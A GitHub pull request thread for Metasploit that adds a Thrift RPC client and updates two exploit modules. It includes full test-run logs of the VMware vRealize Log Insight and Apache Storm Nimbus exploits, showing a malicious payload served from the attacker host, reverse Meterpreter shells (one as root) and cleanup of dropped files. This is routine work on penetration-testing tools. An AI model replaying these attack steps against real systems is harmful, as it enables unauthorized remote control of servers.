Add a Thrift RPC client

[zeroSteiner]

This adds a new ThriftClient class for interacting with Thrift RPC services. It then updates the two existing Metasploit modules to use it. It also includes additional type definitions, allowing the updated modules to define their data instead of using opaque blobs.

Both exploits were retested to ensure they're still functioning correctly.

• Test nimbus_gettopologyhistory_cmd_exec
• Test vmware_vrli_rce

[adfoster-r7]

Would be good to sprinkle in a few unit tests to help future proof things 🙌

[jheysel-r7]

Changes look great and testing both modules worked as expected. I'll approve this as is and leave it open for a potential sprinkling of unit tests :)

vmware_vrli_rce

msf6 exploit(linux/http/vmware_vrli_rce) > run

[*] Started reverse TCP handler on 192.168.1.72:4444
[*] 192.168.1.10:443 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.1.10:443 - Checking if 192.168.1.10:443 can be exploited.
[+] 192.168.1.10:443 - The target appears to be vulnerable. VMware XRLI Version: 8.10
[*] 192.168.1.10:443 - Starting Payload Server
[*] 192.168.1.10:443 - Using URL: http://192.168.1.72:8080/StTsERb.tar
[*] 192.168.1.10:443 - Fetching thrift config...
[+] 192.168.1.10:443 - Obtained node token: a2234787-e6d1-4d6a-ad6f-035a4dfdf3fd
[*] 192.168.1.10:443 - Sending getNodeType...
[*] 192.168.1.10:443 - Sending RemotePakDownloadCommand...
[*] 192.168.1.10:443 - Encoding the payload as JSP
[*] 192.168.1.10:443 - Malicious TAR payload created (117760 bytes)
[+] 192.168.1.10:443 - Payload requested by 192.168.1.10:443, sending...
[*] 192.168.1.10:443 - Sending PakUpgradeCommand...
[+] 192.168.1.10:443 - PakUpgrade request is successful
[*] 192.168.1.10:443 - Waiting 2 second for PakUpgrade...
[*] 192.168.1.10:443 - 192.168.1.10:443 - Triggering JSP payload...
[*] Sending stage (3045380 bytes) to 192.168.1.10
[+] 192.168.1.10:443 - Deleted /tmp/StTsERb.pak
[+] 192.168.1.10:443 - Deleted /usr/lib/loginsight/application/3rd_party/apache-tomcat-8.5.82/webapps/ROOT/loginsight/api/api-v5-documentation.jsp
[*] Meterpreter session 1 opened (192.168.1.72:4444 -> 192.168.1.10:50108) at 2023-09-14 12:15:32 -0400
[*] 192.168.1.10:443 - Server stopped.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : node-1w7jr9qrlfdid0mdzfbqbw6mq.ipv6.telus.net
OS           : VMware Photon OS 3.0 (Linux 4.19.256-1.ph3)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit

nimbus_gettopologyhistory_cmd_exec

msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] 127.0.0.1:6627 - Running automatic check ("set AutoCheck false" to disable)
[+] 127.0.0.1:6627 - The target appears to be vulnerable. Successfully tested command injection.
[*] 127.0.0.1:6627 - Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Sending stage (3045380 bytes) to 172.16.199.1
[*] 127.0.0.1:6627 - Command Stager progress - 100.00% done (823/823 bytes)
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.1:55473) at 2023-09-14 14:30:16 -0400

meterpreter > getuid
Server username: storm
meterpreter > sysinfo
Computer     : 172.17.0.3
OS           : Debian 11.1 (Linux 6.3.13-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

[zeroSteiner]

Alright, tests have been added for the data structures. Once they pass, this should be ready to go. Thanks!

[zeroSteiner]

Jenkins test this please

[jheysel-r7]

Release Notes

This adds a new ThriftClient class for interacting with Thrift RPC services. It also updates the two existing Metasploit modules to use it.